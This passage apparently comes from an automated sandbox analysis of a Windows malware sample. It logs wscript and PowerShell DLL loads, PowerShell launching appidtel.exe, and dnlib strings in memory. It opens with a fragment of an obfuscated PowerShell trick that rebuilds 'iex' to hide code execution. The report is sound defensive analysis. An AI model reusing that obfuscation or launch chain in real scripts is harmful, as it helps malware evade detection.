([striNg]$veRBosePrEfErencE)[1,3]+'x'-JoiN'')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1769352732.00007FFB4A210000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 0000000B.00000002.1841958325.000000000356E000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1808603345.0000000003225000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1806418136.0000000003079000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 0000000B.00000002.1841958325.000000000356E000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1808603345.0000000003225000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000003.1806418136.0000000003079000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 0000000B.00000002.1841958325.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1769352732.00007FFB4A210000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.1648832877.0000021AF6A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749889044.0000021AFED80000.00000004.08000000.00040000.00000000.sdmp
